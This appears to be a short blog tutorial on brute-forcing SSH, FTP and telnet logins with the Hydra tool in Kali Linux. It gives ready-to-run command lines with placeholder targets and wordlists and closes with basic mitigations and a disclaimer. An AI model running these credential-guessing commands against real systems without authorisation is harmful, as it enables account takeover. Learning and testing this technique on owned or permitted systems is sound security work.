Kali Linux Hydra Tool Example

Posted by

Hydra is a pre-installed tool in Kali Linux used to brute-force username and password to different services such as ftp, ssh, telnet, MS-SQL etc. Brute-force can be used as a technique to try different usernames and passwords against a target to identify correct credentials.

Check the usage of Hydra by using of below command:

#hydra -h

 To brute-force ssh username and password

Create a username and password list to enumerate a target by using a hydra automation tool. You can access the wordlist in a directory by using the below command.

cd /usr/share/wordlists

-l: input login

-L: list of username

-p: single password

-P: list of passwords

#hydra <Target_IP> ssh -l <username> -P <password_file> -s 22 -vV
#hydra <Target_IP> ssh -l <username> -p <password> -s 22 -vV

 To brute-force FTP username and password

#hydra -L <username_file> -P <password_file> ftp://<Target_IP>
#hydra -l <username> -p <password> ftp://<Target_IP>

 To brute-force telnet username and password

#hydra -l <username> -p <password> telnet://<Target_IP>

Mitigation to avoid brute-force attack of username and password 

Implementing account lockout, captcha implementation, complex password, two-factor authentication, hardware-based token authentication, etc. are some of the techniques of avoiding brute-force attack on the target.

Disclaimer: This tutorial is for educational purpose only. Individual is solely responsible for any illegal act.

Feel free to leave a comment below or reach me on Instagram @iamshubhamkumar__.

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s

This site uses Akismet to reduce spam. Learn how your comment data is processed.